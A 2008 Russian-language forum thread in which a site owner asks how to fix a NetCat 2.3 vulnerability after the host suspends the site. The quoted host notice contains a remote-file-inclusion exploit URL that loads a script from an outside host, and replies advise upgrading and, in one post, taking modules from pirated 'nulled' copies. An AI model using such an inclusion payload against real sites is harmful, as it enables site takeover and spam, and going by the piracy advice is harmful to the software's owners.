Проблема уязвимости в Неткат 2.3

Тема в разделе "NetCat", создана пользователем dmeg, 26 сен 2008.

Статус темы:
Закрыта.
  1. dmeg

    dmeg Создатель

    Регистр.:
    6 май 2006
    Сообщения:
    22
    Симпатии:
    0
    Ребята, помогите!!!!!!! Хостер прекратил работу сайта по причине -
    -----
    Здравствуйте. Скрипты Вашего хостинга имеют серьёзные уязвимости в
    системе безопастности из-за которых возможен взлом Вашего сайта и
    рассылка спама. Просьба устранить данную проблему и сообщить нам. Пример
    эксплуатации уязвимости
    http://сайт.ру/?INCLUDE_FOLDER=http://www.freewebtown.com/lolicii/main.txt?
    -----
    NetCat зануленый, обновлений не ставилось.... что можно предпринять? И есть ли возможность обновится до 2.4? есть ли у кого обновления? Заранее благодарю!!!!
     
  2. unsiker

    unsiker

    Регистр.:
    6 июн 2008
    Сообщения:
    465
    Симпатии:
    172
    попробуй прописать $DOCUMENT_ROOT в vars.inc.php . Его 100% нужно явно указывать
     
  3. dmeg

    dmeg Создатель

    Регистр.:
    6 май 2006
    Сообщения:
    22
    Симпатии:
    0
    Путь прописан.... в Vars прописан
     
  4. InoffLine

    InoffLine

    Регистр.:
    18 апр 2007
    Сообщения:
    573
    Симпатии:
    155
    Обновляй систему на 2.4
    Это реально.
    причем как я понимаю исправили они ошибку эту не сразу, а в каком-то патче.
    Вроде в 2.4.3, хотя хз.
     
  5. dmeg

    dmeg Создатель

    Регистр.:
    6 май 2006
    Сообщения:
    22
    Симпатии:
    0
    Спасибо, обновил до 2.4 и проблема устаранилась!

    Добавлено через 1 минуту
    а где можно взять дополнительные модули к 2.4 например капча, форум и инет-магазин?
     
  6. Odium

    Odium

    Регистр.:
    26 мар 2006
    Сообщения:
    153
    Симпатии:
    81
    Их необходимо вырезать из нулл версии - новой.
     
  7. yakodzun

    yakodzun Прохожие

Статус темы:
Закрыта.